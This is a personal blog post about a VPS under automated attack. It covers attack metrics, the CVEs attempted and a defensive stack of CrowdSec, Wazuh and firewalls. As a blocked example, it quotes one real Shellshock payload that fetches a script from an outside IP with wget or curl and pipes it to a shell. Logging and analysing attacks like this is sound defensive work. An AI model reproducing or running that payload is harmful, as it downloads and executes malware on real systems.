My Digital Wake-Up Call


I’m new to the reality of the internet as a battleground—though maybe it always was one. I’ve recently taken the plunge, striving to learn as much as I can and develop my skills in multiple areas simultaneously, especially cybersecurity.

This journey has led me to a much more serious consideration of internet-facing security and the severe implications of ignoring it.

Waking up to personal security alerts screaming that my infrastructure was under attack was a peculiar experience. Yet, it became a valuable learning opportunity. I decided not just to follow the automated tool’s recommendations, but to go beyond them.

I proceeded to drop the foreign connection and then dove deeper, investigating the nature of the specific CVE that was being exploited.

The tools at my disposal—Crowdsec, Wazuh, and Netdata—have been incredible. It’s been an amazing experience getting this stack working to my benefit and actually seeing the results of my implementation in real-time.

I am still learning, but it’s the journey that interests me, not the destination.

Below are some details:

Security Threat Surface Analysis


Infrastructure Overview


ComponentDetails
Server TypeVPS (2 CPU, 4GB RAM)
MonitoringReal-time log analysis, threat detection

Attack Metrics Summary


Attack CategoryAttempts BlockedSeverityDetails
HTTP Scanning14,895HighMass vulnerability scanning
SSH Brute Force2,625HighPassword guessing attacks
HTTP Exploits165HighCVE exploitation attempts
SMB Attacks136MediumFile share brute force
Spam Attempts123MediumSMTP abuse
CVE Exploits9HighSpecific vulnerability attacks
Bad User Agents16MediumMalicious bot traffic
Open Proxy Abuse2MediumProxy service attempts

Defense Performance


Security LayerEffectivenessMetrics
CrowdSecExcellent18,364 IPs blocked
Firewall BouncerExcellent3.96GB processed safely
Wazuh DetectionExcellentReal-time CVE alerts
Community BlocklistExcellent18,362 IPs from CAPI

Traffic Analysis


Log SourceLines ProcessedThreats Detected
nginx access.log89 lines87 whitelisted (legitimate traffic)
nginx error.log3 linesConfiguration issues
SSH service296 linesBrute force patterns
Samba logs135 linesFile share attacks

Notable Attack Examples


Shellshock Exploit Attempt


# Detected and blocked by Wazuh
"() { :; }; /bin/bash -c \"(wget -qO- http://74.194.191.52/rondo.qre.sh||busybox wget -qO- http://74.194.191.52/rondo.qre.sh||curl -s http://74.194.191.52/rondo.qre.sh)|sh\""

**Source IP**: 192.159.99.95 (United Kingdom)

**Payload**: Multi-stage malware download

**Status**: Blocked by CrowdSec with manual firewall rule

## CVE Exploitation Attempts
---

- **CVE-2021-41773** (Apache Path Traversal) - 4 attempts
- **CVE-2021-42013** (Apache RCE) - 1 attempt
- **CVE-2017-9841** (PHPUnit RCE) - 3 attempts
- **ThinkPHP CVE-2018-20062** - 1 attempt

## Security Stack Effectiveness
---

| Tool | Role | Performance |
|------|------|-------------|
| **CrowdSec** | Behavioral detection | Excellent |
| **Wazuh** | SIEM & compliance | Excellent |
| **iptables** | Network filtering | Excellent |
| **nginx** | Web application firewall | Excellent |

Key Takeaways


  • No Server is Too Small - Even basic blogs attract significant attack attention
  • Automated Attacks Dominate - 99% of attempts are scripted, not targeted
  • Layered Defense Works - Multiple security tools provide comprehensive protection
  • Visibility is Crucial - Without monitoring, attacks go undetected
  • Community Intelligence - Crowd-sourced blocklists are incredibly effective

Essential Security Stack (for learning)


monitoring:

  • CrowdSec (behavioral analysis)
  • Wazuh (SIEM & compliance, overkill but an amazing thing to lean)
  • fail2ban (pattern blocking)

network:

  • iptables/ufw (firewall)
  • Cloudflare (DDoS protection)

application:

  • nginx with security headers
  • Regular vulnerability scanning

Conclusion


Running internet-facing services means constant exposure to automated attacks. The metrics demonstrate that even a small VPS with basic services faces thousands of daily attack attempts. However, with proper security tooling and monitoring, these threats can be effectively mitigated.

The reality of modern internet security: your server will be attacked. The critical differentiator is whether you have the visibility to detect these attempts and the tools to respond effectively.

“Security isn’t about preventing all attacks; it’s about detecting, responding, and learning from them.”